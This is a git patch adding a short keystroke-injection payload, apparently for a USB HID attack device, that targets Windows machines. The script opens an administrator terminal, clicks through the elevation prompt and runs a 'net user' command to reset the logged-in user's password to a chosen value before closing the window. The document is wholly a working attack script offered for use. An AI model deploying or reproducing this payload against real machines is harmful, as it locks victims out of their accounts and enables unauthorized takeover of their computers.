From 0e6575b3aa2ef2ecb1060dc4d7a1c3876398e8eb Mon Sep 17 00:00:00 2001 From: bst04 <75524846+brunoooost@users.noreply.github.com> Date: Mon, 28 Oct 2024 11:20:40 +0100 Subject: [PATCH] Create change_password.txt --- windows/change_password.txt | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 windows/change_password.txt diff --git a/windows/change_password.txt b/windows/change_password.txt new file mode 100644 index 0000000..5a46892 --- /dev/null +++ b/windows/change_password.txt @@ -0,0 +1,22 @@ +REM ================================ +REM payload made by bst04 +REM Windows Devices +REM change "password" with another +REM ================================ + +DELAY 1000 +GUI x +DELAY 500 +STRING a +DELAY 500 +LEFT_ARROW +DELAY 500 +ENTER + +DELAY 2000 +STRING net user $env:USERNAME +STRING "password" +ENTER +DELAY 1000 + +ALT F4